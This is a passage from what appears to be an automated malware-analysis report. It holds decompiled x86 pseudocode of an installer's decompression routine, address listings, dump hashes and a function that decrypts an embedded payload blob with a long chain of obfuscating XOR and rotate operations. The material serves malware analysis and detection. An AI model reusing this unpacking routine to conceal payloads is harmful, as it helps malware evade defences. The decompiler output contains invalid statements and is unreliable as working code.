							__eax = (__eflags >= 0) - 1 + 0xb;
							 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
							goto L120;
						case 0x16:
							__eax =  *(__ebp - 0x30);
							__eflags = __eax - 4;
							if(__eax >= 4) {
								_push(3);
								_pop(__eax);
							}
							__ecx =  *(__ebp - 4);
							 *(__ebp - 0x40) = 6;
							__eax = __eax << 7;
							 *(__ebp - 0x7c) = 0x19;
							 *(__ebp - 0x58) = __eax;
							goto L145;
						case 0x17:
							L145:
							__eax =  *(__ebp - 0x40);
							 *(__ebp - 0x50) = 1;
							 *(__ebp - 0x48) =  *(__ebp - 0x40);
							goto L149;
						case 0x18:
							L146:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0x18;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t484 = __ebp - 0x70;
							 *_t484 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t484;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							L148:
							_t487 = __ebp - 0x48;
							 *_t487 =  *(__ebp - 0x48) - 1;
							__eflags =  *_t487;
							L149:
							__eflags =  *(__ebp - 0x48);
							if( *(__ebp - 0x48) <= 0) {
								__ecx =  *(__ebp - 0x40);
								__ebx =  *(__ebp - 0x50);
								0 = 1;
								__eax = 1 << __cl;
								__ebx =  *(__ebp - 0x50) - (1 << __cl);
								__eax =  *(__ebp - 0x7c);
								 *(__ebp - 0x44) = __ebx;
								goto L140;
							}
							__eax =  *(__ebp - 0x50);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
							__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
							__eax =  *(__ebp - 0x58);
							__esi = __edx + __eax;
							 *(__ebp - 0x54) = __esi;
							__ax =  *__esi;
							__edi = __ax & 0x0000ffff;
							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
							__eflags =  *(__ebp - 0xc) - __ecx;
							if( *(__ebp - 0xc) >= __ecx) {
								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
								__cx = __ax;
								__cx = __ax >> 5;
								__eax = __eax - __ecx;
								__edx = __edx + 1;
								__eflags = __edx;
								 *__esi = __ax;
								 *(__ebp - 0x50) = __edx;
							} else {
								 *(__ebp - 0x10) = __ecx;
								0x800 = 0x800 - __edi;
								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
								 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
								 *__esi = __cx;
							}
							__eflags =  *(__ebp - 0x10) - 0x1000000;
							if( *(__ebp - 0x10) >= 0x1000000) {
								goto L148;
							} else {
								goto L146;
							}
						case 0x19:
							__eflags = __ebx - 4;
							if(__ebx < 4) {
								 *(__ebp - 0x2c) = __ebx;
								L119:
								_t393 = __ebp - 0x2c;
								 *_t393 =  *(__ebp - 0x2c) + 1;
								__eflags =  *_t393;
								L120:
								__eax =  *(__ebp - 0x2c);
								__eflags = __eax;
								if(__eax == 0) {
									 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
									goto L170;
								}
								__eflags = __eax -  *(__ebp - 0x60);
								if(__eax >  *(__ebp - 0x60)) {
									goto L171;
								}
								 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
								__eax =  *(__ebp - 0x30);
								_t400 = __ebp - 0x60;
								 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
								__eflags =  *_t400;
								goto L123;
							}
							__ecx = __ebx;
							__eax = __ebx;
							__ecx = __ebx >> 1;
							__eax = __ebx & 0x00000001;
							__ecx = (__ebx >> 1) - 1;
							__al = __al | 0x00000002;
							__eax = (__ebx & 0x00000001) << __cl;
							__eflags = __ebx - 0xe;
							 *(__ebp - 0x2c) = __eax;
							if(__ebx >= 0xe) {
								__ebx = 0;
								 *(__ebp - 0x48) = __ecx;
								L102:
								__eflags =  *(__ebp - 0x48);
								if( *(__ebp - 0x48) <= 0) {
									__eax = __eax + __ebx;
									 *(__ebp - 0x40) = 4;
									 *(__ebp - 0x2c) = __eax;
									__eax =  *(__ebp - 4);
									__eax =  *(__ebp - 4) + 0x644;
									__eflags = __eax;
									L108:
									__ebx = 0;
									 *(__ebp - 0x58) = __eax;
									 *(__ebp - 0x50) = 1;
									 *(__ebp - 0x44) = 0;
									 *(__ebp - 0x48) = 0;
									L112:
									__eax =  *(__ebp - 0x40);
									__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
									if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
										_t391 = __ebp - 0x2c;
										 *_t391 =  *(__ebp - 0x2c) + __ebx;
										__eflags =  *_t391;
										goto L119;
									}
									__eax =  *(__ebp - 0x50);
									 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
									__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
									__eax =  *(__ebp - 0x58);
									__esi = __edi + __eax;
									 *(__ebp - 0x54) = __esi;
									__ax =  *__esi;
									__ecx = __ax & 0x0000ffff;
									__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
									__eflags =  *(__ebp - 0xc) - __edx;
									if( *(__ebp - 0xc) >= __edx) {
										__ecx = 0;
										 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
										__ecx = 1;
										 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
										__ebx = 1;
										__ecx =  *(__ebp - 0x48);
										__ebx = 1 << __cl;
										__ecx = 1 << __cl;
										__ebx =  *(__ebp - 0x44);
										__ebx =  *(__ebp - 0x44) | __ecx;
										__cx = __ax;
										__cx = __ax >> 5;
										__eax = __eax - __ecx;
										__edi = __edi + 1;
										__eflags = __edi;
										 *(__ebp - 0x44) = __ebx;
										 *__esi = __ax;
										 *(__ebp - 0x50) = __edi;
									} else {
										 *(__ebp - 0x10) = __edx;
										0x800 = 0x800 - __ecx;
										0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
										 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
										 *__esi = __dx;
									}
									__eflags =  *(__ebp - 0x10) - 0x1000000;
									if( *(__ebp - 0x10) >= 0x1000000) {
										L111:
										_t368 = __ebp - 0x48;
										 *_t368 =  *(__ebp - 0x48) + 1;
										__eflags =  *_t368;
										goto L112;
									} else {
										goto L109;
									}
								}
								__ecx =  *(__ebp - 0xc);
								__ebx = __ebx + __ebx;
								 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
								__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
								 *(__ebp - 0x44) = __ebx;
								if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
									__ecx =  *(__ebp - 0x10);
									 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
									__ebx = __ebx | 0x00000001;
									__eflags = __ebx;
									 *(__ebp - 0x44) = __ebx;
								}
								__eflags =  *(__ebp - 0x10) - 0x1000000;
								if( *(__ebp - 0x10) >= 0x1000000) {
									L101:
									_t338 = __ebp - 0x48;
									 *_t338 =  *(__ebp - 0x48) - 1;
									__eflags =  *_t338;
									goto L102;
								} else {
									goto L99;
								}
							}
							__edx =  *(__ebp - 4);
							__eax = __eax - __ebx;
							 *(__ebp - 0x40) = __ecx;
							__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
							goto L108;
						case 0x1a:
							goto L55;
						case 0x1b:
							L75:
							__eflags =  *(__ebp - 0x64);
							if( *(__ebp - 0x64) == 0) {
								 *(__ebp - 0x88) = 0x1b;
								goto L170;
							}
							__eax =  *(__ebp - 0x14);
							__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
							__eflags = __eax -  *(__ebp - 0x74);
							if(__eax >=  *(__ebp - 0x74)) {
								__eax = __eax +  *(__ebp - 0x74);
								__eflags = __eax;
							}
							__edx =  *(__ebp - 8);
							__cl =  *(__eax + __edx);
							__eax =  *(__ebp - 0x14);
							 *(__ebp - 0x5c) = __cl;
							 *(__eax + __edx) = __cl;
							__eax = __eax + 1;
							__edx = 0;
							_t274 = __eax %  *(__ebp - 0x74);
							__eax = __eax /  *(__ebp - 0x74);
							__edx = _t274;
							__eax =  *(__ebp - 0x68);
							 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
							 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
							_t283 = __ebp - 0x64;
							 *_t283 =  *(__ebp - 0x64) - 1;
							__eflags =  *_t283;
							 *( *(__ebp - 0x68)) = __cl;
							goto L79;
						case 0x1c:
							while(1) {
								L123:
								__eflags =  *(__ebp - 0x64);
								if( *(__ebp - 0x64) == 0) {
									break;
								}
								__eax =  *(__ebp - 0x14);
								__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
								__eflags = __eax -  *(__ebp - 0x74);
								if(__eax >=  *(__ebp - 0x74)) {
									__eax = __eax +  *(__ebp - 0x74);
									__eflags = __eax;
								}
								__edx =  *(__ebp - 8);
								__cl =  *(__eax + __edx);
								__eax =  *(__ebp - 0x14);
								 *(__ebp - 0x5c) = __cl;
								 *(__eax + __edx) = __cl;
								__eax = __eax + 1;
								__edx = 0;
								_t414 = __eax %  *(__ebp - 0x74);
								__eax = __eax /  *(__ebp - 0x74);
								__edx = _t414;
								__eax =  *(__ebp - 0x68);
								 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
								 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
								 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
								__eflags =  *(__ebp - 0x30);
								 *( *(__ebp - 0x68)) = __cl;
								 *(__ebp - 0x14) = __edx;
								if( *(__ebp - 0x30) > 0) {
									continue;
								} else {
									goto L80;
								}
							}
							 *(__ebp - 0x88) = 0x1c;
							goto L170;
					}
				}
			}













                        0x00000000
                        0x004061d4
                        0x004061d4
                        0x004061d9
                        0x00406250
                        0x00406257
                        0x00406261
                        0x00406840
                        0x00406840
                        0x00406843
                        0x00406843
                        0x00406849
                        0x0040684f
                        0x00406855
                        0x0040686f
                        0x00406872
                        0x00406878
                        0x00406883
                        0x00406885
                        0x00406857
                        0x00406857
                        0x00406866
                        0x0040686a
                        0x0040686a
                        0x0040688f
                        0x004068b6
                        0x004068b6
                        0x004068bc
                        0x004068bc
                        0x00000000
                        0x00406891
                        0x00406891
                        0x00406895
                        0x00406a44
                        0x00000000
                        0x00406a44
                        0x004068a1
                        0x004068a8
                        0x004068b0
                        0x004068b3
                        0x00000000
                        0x004068b3
                        0x004061db
                        0x004061db
                        0x004061df
                        0x004061e7
                        0x004061ea
                        0x004061ec
                        0x004061ef
                        0x004061f1
                        0x004061f6
                        0x004061f9
                        0x00406200
                        0x00406207
                        0x0040620a
                        0x00406215
                        0x0040621d
                        0x0040621d
                        0x00406217
                        0x00406217
                        0x00406217
                        0x0040620c
                        0x0040620c
                        0x0040620c
                        0x00406224
                        0x00406242
                        0x00406244
                        0x00406417
                        0x00406417
                        0x0040641a
                        0x0040641d
                        0x00406420
                        0x00406423
                        0x00406426
                        0x00406429
                        0x0040642c
                        0x0040642f
                        0x00406435
                        0x0040644d
                        0x00406450
                        0x00406453
                        0x00406456
                        0x00406456
                        0x00406459
                        0x0040645f
                        0x00406437
                        0x00406437
                        0x0040643f
                        0x00406444
                        0x00406446
                        0x00406448
                        0x00406448
                        0x00406469
                        0x0040646c
                        0x0040640f
                        0x00406415
                        0x00000000
                        0x00000000
                        0x00000000
                        0x0040646e
                        0x004063ea
                        0x004063ee
                        0x004069f6
                        0x00000000
                        0x004069f6
                        0x004063f4
                        0x004063f7
                        0x004063fa
                        0x004063fe
                        0x00406401
                        0x00406407
                        0x00406409
                        0x00406409
                        0x0040640c
                        0x00000000
                        0x0040640c
                        0x00406226
                        0x00406226
                        0x00406229
                        0x0040622f
                        0x00406231
                        0x00406231
                        0x00406234
                        0x00406237
                        0x00406239
                        0x0040623a
                        0x0040623d
                        0x004062aa
                        0x004062aa
                        0x004062ae
                        0x004062b1
                        0x004062b4
                        0x004062b7
                        0x004062ba
                        0x004062bb
                        0x004062be
                        0x004062c0
                        0x004062c6
                        0x004062c9
                        0x004062cc
                        0x004062cf
                        0x004062d2
                        0x004062d8
                        0x004062f4
                        0x004062f7
                        0x004062fa
                        0x004062fd
                        0x00406304
                        0x0040630a
                        0x0040630e
                        0x004062da
                        0x004062da
                        0x004062de
                        0x004062e6
                        0x004062eb
                        0x004062ed
                        0x004062ef
                        0x004062ef
                        0x00406318
                        0x0040631b
                        0x00406292
                        0x00406292
                        0x00406298
                        0x0040634b
                        0x00406351
                        0x00000000
                        0x00000000
                        0x00406353
                        0x00406356
                        0x00406359
                        0x0040635c
                        0x0040635f
                        0x00406362
                        0x00406365
                        0x00406368
                        0x0040636b
                        0x00406371
                        0x00406389
                        0x0040638c
                        0x0040638f
                        0x00406392
                        0x00406392
                        0x00406395
                        0x0040639b
                        0x00406373
                        0x00406373
                        0x0040637b
                        0x00406380
                        0x00406382
                        0x00406384
                        0x00406384
                        0x004063a5
                        0x004063a8
                        0x00406326
                        0x0040632a
                        0x004069ea
                        0x00000000
                        0x004069ea
                        0x00406330
                        0x00406333
                        0x00406336
                        0x0040633a
                        0x0040633d
                        0x00406343
                        0x00406345
                        0x00406345
                        0x00406348
                        0x00406348
                        0x004063a8
                        0x004063af
                        0x004063af
                        0x004063af
                        0x004063b3
                        0x004063b3
                        0x004063b6
                        0x004063b9
                        0x004063bd
                        0x00406a02
                        0x00000000
                        0x00406a02
                        0x004063c3
                        0x004063c6
                        0x004063c9
                        0x004063cc
                        0x004063cf
                        0x004063d2
                        0x004063d5
                        0x004063d7
                        0x004063da
                        0x004063dd
                        0x004063e0
                        0x004063e2
                        0x004063e2
                        0x004063e2
                        0x0040657f
                        0x0040657f
                        0x00406582
                        0x00406582
                        0x00000000
                        0x00406582
                        0x004062a4
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00406321
                        0x0040626d
                        0x00406271
                        0x004069de
                        0x00406a5a
                        0x00406a62
                        0x00406a69
                        0x00406a6b
                        0x00406a72
                        0x00406a76
                        0x00406a76
                        0x00406277
                        0x0040627a
                        0x0040627d
                        0x00406281
                        0x00406284
                        0x0040628a
                        0x0040628c
                        0x0040628c
                        0x0040628f
                        0x00000000
                        0x0040628f
                        0x0040631b
                        0x00406224
                        0x00406058
                        0x00406058
                        0x00406061
                        0x00406a6f
                        0x00406a6f
                        0x00000000
                        0x00406a6f
                        0x00406067
                        0x00000000
                        0x00406072
                        0x00000000
                        0x00000000
                        0x0040607b
                        0x0040607e
                        0x00406081
                        0x00406085
                        0x00000000
                        0x00000000
                        0x0040608b
                        0x0040608e
                        0x00406090
                        0x00406091
                        0x00406094
                        0x00406096
                        0x00406097
                        0x00406099
                        0x0040609c
                        0x004060a1
                        0x004060a6
                        0x004060af
                        0x004060c2
                        0x004060c5
                        0x004060d1
                        0x004060f9
                        0x004060fb
                        0x00406109
                        0x00406109
                        0x0040610d
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00000000
                        0x004060fd
                        0x004060fd
                        0x00406100
                        0x00406101
                        0x00406101
                        0x00000000
                        0x004060fd
                        0x004060d7
                        0x004060dc
                        0x004060dc
                        0x004060e5
                        0x004060ed
                        0x004060f0
                        0x00000000
                        0x004060f6
                        0x004060f6
                        0x00000000
                        0x004060f6
                        0x00000000
                        0x00406113
                        0x00406113
                        0x00406117
                        0x004069c3
                        0x00000000
                        0x004069c3
                        0x00406120
                        0x00406130
                        0x00406133
                        0x00406136
                        0x00406136
                        0x00406136
                        0x00406139
                        0x0040613d
                        0x00000000
                        0x00000000
                        0x0040613f
                        0x00406145
                        0x0040616f
                        0x00406175
                        0x0040617c
                        0x00000000
                        0x0040617c
                        0x0040614b
                        0x0040614e
                        0x00406153
                        0x00406153
                        0x0040615e
                        0x00406166
                        0x00406169
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00000000
                        0x004061ae
                        0x004061b4
                        0x004061b7
                        0x004061c4
                        0x004061cc
                        0x00000000
                        0x00000000
                        0x00406183
                        0x00406183
                        0x00406187
                        0x004069d2
                        0x00000000
                        0x004069d2
                        0x00406193
                        0x0040619e
                        0x0040619e
                        0x0040619e
                        0x004061a1
                        0x004061a4
                        0x004061a7
                        0x004061ac
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00406473
                        0x00406477
                        0x00406495
                        0x00406498
                        0x0040649f
                        0x004064a2
                        0x004064a5
                        0x004064a8
                        0x004064ab
                        0x004064ae
                        0x004064b0
                        0x004064b7
                        0x004064b8
                        0x004064ba
                        0x004064bd
                        0x004064c0
                        0x004064c3
                        0x004064c3
                        0x004064c8
                        0x00000000
                        0x004064c8
                        0x00406479
                        0x0040647c
                        0x0040647f
                        0x00406489
                        0x00000000
                        0x00000000
                        0x004064dd
                        0x004064e1
                        0x00406504
                        0x00406507
                        0x0040650a
                        0x00406514
                        0x004064e3
                        0x004064e3
                        0x004064e6
                        0x004064e9
                        0x004064ec
                        0x004064f9
                        0x004064fc
                        0x004064fc
                        0x00000000
                        0x00000000
                        0x00406520
                        0x00406524
                        0x00000000
                        0x00000000
                        0x0040652a
                        0x0040652e
                        0x00000000
                        0x00000000
                        0x00406534
                        0x00406536
                        0x0040653a
                        0x0040653a
                        0x0040653d
                        0x00406541
                        0x00000000
                        0x00000000
                        0x00406591
                        0x00406595
                        0x0040659c
                        0x0040659f
                        0x004065a2
                        0x004065ac
                        0x00000000
                        0x004065ac
                        0x00406597
                        0x00000000
                        0x00000000
                        0x004065b8
                        0x004065bc
                        0x004065c3
                        0x004065c6
                        0x004065c9
                        0x004065be
                        0x004065be
                        0x004065be
                        0x004065cc
                        0x004065cf
                        0x004065d2
                        0x004065d2
                        0x004065d5
                        0x004065d8
                        0x004065db
                        0x004065db
                        0x004065de
                        0x004065e5
                        0x004065ea
                        0x00000000
                        0x00000000
                        0x00406678
                        0x00406678
                        0x0040667c
                        0x00406a1a
                        0x00000000
                        0x00406a1a
                        0x00406682
                        0x00406685
                        0x00406688
                        0x0040668c
                        0x0040668f
                        0x00406695
                        0x00406697
                        0x00406697
                        0x00406697
                        0x0040669a
                        0x0040669d
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00000000
                        0x004066fb
                        0x004066fb
                        0x004066ff
                        0x00406a26
                        0x00000000
                        0x00406a26
                        0x00406705
                        0x00406708
                        0x0040670b
                        0x0040670f
                        0x00406712
                        0x00406718
                        0x0040671a
                        0x0040671a
                        0x0040671a
                        0x0040671d
                        0x00000000
                        0x00000000
                        0x004064cb
                        0x004064cb
                        0x004064ce
                        0x00000000
                        0x00000000
                        0x0040680a
                        0x0040680e
                        0x00406830
                        0x00406833
                        0x0040683d
                        0x00000000
                        0x0040683d
                        0x00406810
                        0x00406813
                        0x00406817
                        0x0040681a
                        0x0040681a
                        0x0040681d
                        0x00000000
                        0x00000000
                        0x004068c7
                        0x004068cb
                        0x004068e9
                        0x004068e9
                        0x004068e9
                        0x004068f0
                        0x004068f7
                        0x004068fe
                        0x004068fe
                        0x00000000
                        0x004068fe
                        0x004068cd
                        0x004068d0
                        0x004068d3
                        0x004068d6
                        0x004068dd
                        0x00406821
                        0x00406821
                        0x00406824
                        0x00000000
                        0x00000000
                        0x004069b8
                        0x004069bb
                        0x00000000
                        0x00000000
                        0x004065f2
                        0x004065f4
                        0x004065fb
                        0x004065fc
                        0x004065fe
                        0x00406601
                        0x00000000
                        0x00000000
                        0x00406609
                        0x0040660c
                        0x0040660f
                        0x00406611
                        0x00406613
                        0x00406613
                        0x00406614
                        0x00406617
                        0x0040661e
                        0x00406621
                        0x0040662f
                        0x00000000
                        0x00000000
                        0x00406905
                        0x00406905
                        0x00406908
                        0x0040690f
                        0x00000000
                        0x00000000
                        0x00406914
                        0x00406914
                        0x00406918
                        0x00406a50
                        0x00000000
                        0x00406a50
                        0x0040691e
                        0x00406921
                        0x00406924
                        0x00406928
                        0x0040692b
                        0x00406931
                        0x00406933
                        0x00406933
                        0x00406933
                        0x00406936
                        0x00406939
                        0x00406939
                        0x00406939
                        0x00406939
                        0x0040693c
                        0x0040693c
                        0x00406940
                        0x004069a0
                        0x004069a3
                        0x004069a8
                        0x004069a9
                        0x004069ab
                        0x004069ad
                        0x004069b0
                        0x00000000
                        0x004069b0
                        0x00406942
                        0x00406948
                        0x0040694b
                        0x0040694e
                        0x00406951
                        0x00406954
                        0x00406957
                        0x0040695a
                        0x0040695d
                        0x00406960
                        0x00406963
                        0x0040697c
                        0x0040697f
                        0x00406982
                        0x00406985
                        0x00406989
                        0x0040698b
                        0x0040698b
                        0x0040698c
                        0x0040698f
                        0x00406965
                        0x00406965
                        0x0040696d
                        0x00406972
                        0x00406974
                        0x00406977
                        0x00406977
                        0x00406992
                        0x00406999
                        0x00000000
                        0x0040699b
                        0x00000000
                        0x0040699b
                        0x00000000
                        0x00406637
                        0x0040663a
                        0x00406670
                        0x004067a0
                        0x004067a0
                        0x004067a0
                        0x004067a0
                        0x004067a3
                        0x004067a3
                        0x004067a6
                        0x004067a8
                        0x00406a32
                        0x00000000
                        0x00406a32
                        0x004067ae
                        0x004067b1
                        0x00000000
                        0x00000000
                        0x004067b7
                        0x004067bb
                        0x004067be
                        0x004067be
                        0x004067be
                        0x00000000
                        0x004067be
                        0x0040663c
                        0x0040663e
                        0x00406640
                        0x00406642
                        0x00406645
                        0x00406646
                        0x00406648
                        0x0040664a
                        0x0040664d
                        0x00406650
                        0x00406666
                        0x0040666b
                        0x004066a3
                        0x004066a3
                        0x004066a7
                        0x004066d3
                        0x004066d5
                        0x004066dc
                        0x004066df
                        0x004066e2
                        0x004066e2
                        0x004066e7
                        0x004066e7
                        0x004066e9
                        0x004066ec
                        0x004066f3
                        0x004066f6
                        0x00406723
                        0x00406723
                        0x00406726
                        0x00406729
                        0x0040679d
                        0x0040679d
                        0x0040679d
                        0x00000000
                        0x0040679d
                        0x0040672b
                        0x00406731
                        0x00406734
                        0x00406737
                        0x0040673a
                        0x0040673d
                        0x00406740
                        0x00406743
                        0x00406746
                        0x00406749
                        0x0040674c
                        0x00406765
                        0x00406767
                        0x0040676a
                        0x0040676b
                        0x0040676e
                        0x00406770
                        0x00406773
                        0x00406775
                        0x00406777
                        0x0040677a
                        0x0040677c
                        0x0040677f
                        0x00406783
                        0x00406785
                        0x00406785
                        0x00406786
                        0x00406789
                        0x0040678c
                        0x0040674e
                        0x0040674e
                        0x00406756
                        0x0040675b
                        0x0040675d
                        0x00406760
                        0x00406760
                        0x0040678f
                        0x00406796
                        0x00406720
                        0x00406720
                        0x00406720
                        0x00406720
                        0x00000000
                        0x00406798
                        0x00000000
                        0x00406798
                        0x00406796
                        0x004066a9
                        0x004066ac
                        0x004066ae
                        0x004066b1
                        0x004066b4
                        0x004066b7
                        0x004066b9
                        0x004066bc
                        0x004066bf
                        0x004066bf
                        0x004066c2
                        0x004066c2
                        0x004066c5
                        0x004066cc
                        0x004066a0
                        0x004066a0
                        0x004066a0
                        0x004066a0
                        0x00000000
                        0x004066ce
                        0x00000000
                        0x004066ce
                        0x004066cc
                        0x00406652
                        0x00406655
                        0x00406657
                        0x0040665a
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00406544
                        0x00406544
                        0x00406548
                        0x00406a0e
                        0x00000000
                        0x00406a0e
                        0x0040654e
                        0x00406551
                        0x00406554
                        0x00406557
                        0x00406559
                        0x00406559
                        0x00406559
                        0x0040655c
                        0x0040655f
                        0x00406562
                        0x00406565
                        0x00406568
                        0x0040656b
                        0x0040656c
                        0x0040656e
                        0x0040656e
                        0x0040656e
                        0x00406571
                        0x00406574
                        0x00406577
                        0x0040657a
                        0x0040657a
                        0x0040657a
                        0x0040657d
                        0x00000000
                        0x00000000
                        0x004067c1
                        0x004067c1
                        0x004067c1
                        0x004067c5
                        0x00000000
                        0x00000000
                        0x004067cb
                        0x004067ce
                        0x004067d1
                        0x004067d4
                        0x004067d6
                        0x004067d6
                        0x004067d6
                        0x004067d9
                        0x004067dc
                        0x004067df
                        0x004067e2
                        0x004067e5
                        0x004067e8
                        0x004067e9
                        0x004067eb
                        0x004067eb
                        0x004067eb
                        0x004067ee
                        0x004067f1
                        0x004067f4
                        0x004067f7
                        0x004067fa
                        0x004067fe
                        0x00406800
                        0x00406803
                        0x00000000
                        0x00406805
                        0x00000000
                        0x00406805
                        0x00406803
                        0x00406a38
                        0x00000000
                        0x00000000
                        0x00406067

                        Memory Dump Source
                        • Source File: 00000000.00000002.352449579.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.352433071.0000000000400000.00000002.00020000.sdmp Download File
                        • Associated: 00000000.00000002.352490534.0000000000407000.00000002.00020000.sdmp Download File
                        • Associated: 00000000.00000002.352519331.0000000000409000.00000004.00020000.sdmp Download File
                        • Associated: 00000000.00000002.352647992.0000000000422000.00000004.00020000.sdmp Download File
                        • Associated: 00000000.00000002.352679041.000000000042A000.00000004.00020000.sdmp Download File
                        • Associated: 00000000.00000002.352707712.000000000042D000.00000002.00020000.sdmp Download File
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 1a16ca79695306fc73f85128c7aced9bd30f9fee4c2e10d2154f2b02c59f7427
                        • Instruction ID: bc715f9ab80968e75e2fbed037c5f1c5951903de2449374fee89636cff417fa3
                        • Opcode Fuzzy Hash: 1a16ca79695306fc73f85128c7aced9bd30f9fee4c2e10d2154f2b02c59f7427
                        • Instruction Fuzzy Hash: 52F18571D00229CBCF28DFA8C8946ADBBB1FF45305F25816ED856BB281D3785A96CF44
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 10003D10, Relevance: 4.7, APIs: 3, Instructions: 234COMMONCrypto
                        Download Yara Rule
                        C-Code - Quality: 16%
                        			E10003D10(void* __edx, void* __eflags) {
				signed int _v20;
				signed int _v24;
				signed int _v25;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				void* __ebx;
				void* __edi;
				intOrPtr _t118;
				void* _t133;
				void* _t212;
				intOrPtr* _t283;

				_v20 = 0;
				 *_t283 = 0xbebc200; // executed
				_t118 = E1000591F(_t133, __edx, _t212); // executed
				_v20 = _t118;
				if(_v20 != 0) {
					 *_t283 = _v20;
					_v40 = 0xde;
					_v36 = 0xbebc200;
					E10007DD0();
					_v24 = 0;
					_v24 = 0;
					while(_v24 < 0x12ae) {
						_v25 =  *((intOrPtr*)(_v24 +  &E1001A000));
						_v25 = _v25 & 0x000000ff ^ 0xffffffff;
						_v25 = (_v25 & 0x000000ff) + _v24;
						_v25 = _v25 & 0x000000ff ^ 0xffffffff;
						_v25 = (_v25 & 0x000000ff) - _v24;
						_v25 = _v25 & 0x000000ff ^ _v24;
						_v25 = _v25 & 0x000000ff ^ 0xffffffff;
						_v25 = _v25 & 0x000000ff ^ 0x000000da;
						_v25 = (_v25 & 0x000000ff) >> 0x00000001 | (_v25 & 0x000000ff) << 0x00000007;
						_v25 = (_v25 & 0x000000ff) - 0xe9;
						_v25 = _v25 & 0x000000ff ^ 0x00000007;
						_v25 = (_v25 & 0x000000ff) - 0xaa;
						_v25 = _v25 & 0x000000ff ^ 0xffffffff;
						_v25 = _v25 & 0x000000ff ^ 0x0000000b;
						_v25 = (_v25 & 0x000000ff) - _v24;
						_v25 = (_v25 & 0x000000ff) >> 0x00000001 | (_v25 & 0x000000ff) << 0x00000007;
						_v25 = _v25 & 0x000000ff ^ _v24;
						_v25 = 0 - (_v25 & 0x000000ff);
						_v25 = (_v25 & 0x000000ff) + 0x3b;
						_v25 = (_v25 & 0x000000ff) >> 0x00000007 | (_v25 & 0x000000ff) << 0x00000001;
						_v25 = (_v25 & 0x000000ff) - 0x21;
						_v25 = _v25 & 0x000000ff ^ _v24;
						_v25 = (_v25 & 0x000000ff) + _v24;
						_v25 = (_v25 & 0x000000ff) >> 0x00000006 | (_v25 & 0x000000ff) << 0x00000002;
						_v25 = (_v25 & 0x000000ff) + 0x73;
						_v25 = 0 - (_v25 & 0x000000ff);
						_v25 = _v25 & 0x000000ff ^ 0xffffffff;
						_v25 = (_v25 & 0x000000ff) + 0x97;
						_v25 = _v25 & 0x000000ff ^ _v24;
						_v25 = (_v25 & 0x000000ff) - _v24;
						_v25 = _v25 & 0x000000ff ^ 0x00000007;
						_v25 = (_v25 & 0x000000ff) - 0x13;
						_v25 = (_v25 & 0x000000ff) >> 0x00000003 | (_v25 & 0x000000ff) << 0x00000005;
						_v25 = (_v25 & 0x000000ff) + _v24;
						_v25 = 0 - (_v25 & 0x000000ff);
						_v25 = (_v25 & 0x000000ff) - _v24;
						_v25 = (_v25 & 0x000000ff) >> 0x00000007 | (_v25 & 0x000000ff) << 0x00000001;
						_v25 = _v25 & 0x000000ff ^ 0x0000002d;
						_v25 = 0 - (_v25 & 0x000000ff);
						_v25 = _v25 & 0x000000ff ^ 0x000000f3;
						_v25 = (_v25 & 0x000000ff) - _v24;
						 *((char*)(_v24 +  &E1001A000)) = _v25;
						_v24 = _v24 + 1;
					}
